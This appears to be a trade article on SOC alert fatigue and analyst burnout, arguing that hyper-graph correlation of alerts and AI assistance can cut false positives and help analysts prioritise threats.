Alert fatigue is a real threat to the Security Operations Centre (SOC). The rate of false positives sees analysts quickly become desensitised and struggle to prioritise their responses.
Automation was supposed to resolve the issue. In reality, however, it has failed to correlate and advance the ability for analytics to respond to threats. This has led to swivel chair operations that see the analyst required to login to, monitor and manage numerous dashboards. Consequently, burnout is at critical levels. A troubling 63% of security professionals reported an increase in stress levels, according to a 2023 report. This effect is exacerbated by a skills shortage in the sector that has grown 19% over the past year. Now, the shortage stands at 4.8m globally according to the ISC2.
It’s a situation further complicated by the way attacks have evolved. In a bid to remain undetected, these seek to utilise the existing tools and functionality that is built into systems. Living off the Land (LotL) attacks, for instance, can harness binaries, scripts and libraries to advance an attack within the environment without the need to deploy additional tools.
In fact, the LOLBAS Project has now documented over 200 instances of code that can be used in this way on the Windows O/S. From a threat detection point of view, this makes it significantly more difficult to spot attacks. Security solutions have to be tuned to look for the minutest deviations from what is considered ‘normal’ network behaviour, resulting in many more false positive alerts.
Using graphs to grapple with alerts
In short, detection is becoming infinitely more subtle and complex and the human and computing resources we have are struggling. Generative AI has been lauded as a possible solution. However, as in other sectors accused of AI-washing, vendors have been sketchy when it comes to the details of how the technology could help. Simply creating an AI chatbot will not add value, instead we need to look again at how we’re approaching the problem and how Artificial Intelligence (AI), in its original sense, could add value.
For the analyst, attempting to figure out if an alert is indicative of an attack is comparable to looking at every pixel of a display screen while attempting to see the full image. That’s because those alert events need to be correlated with other contextual information such as the endpoint and identity used as well as threat intelligence on known threats.
Correlation can be best achieved using graphs which allows those additional pieces of information to be factored in. Hyper graphs could be a game changer here because they allow numerous parameters to be considered and applied to an event, in effect creating not two but multiple axis to model the threat. Events that make up those chains of detection could then be scored to determine whether they warrant investigation.
AI answers to the analyst
Once we have enough of these chains of detections, it becomes possible to use AI’s deductive algorithms to analyse information. Gartner defines AI as applying advanced analysis and logic-based techniques, including machine learning, to interpret events, support and automate decisions, and take actions. This means we can train it to interpret and present the information to the analyst in a digestible format. And, using Generative AI, the analyst can use prompts to gain further details.
Looking to the future, we’re now entering the age of Agentic AI. AI technology is becoming more autonomous and better equipped to make decisions. It’s unlikely that we will see detection become fully automated in this way. However, we could see analysts presented with possible impact scenarios and avenues for effective remediation by an AI “coworker”.
In the meantime, hyper graphs promise to significantly reduce the numbers of false positives being generated. Lab tests have shown it can cut those numbers by up to 90%. This frees up analysts to focus their efforts on the more rewarding aspects of the job. For example: threat hunting, investigation and response.
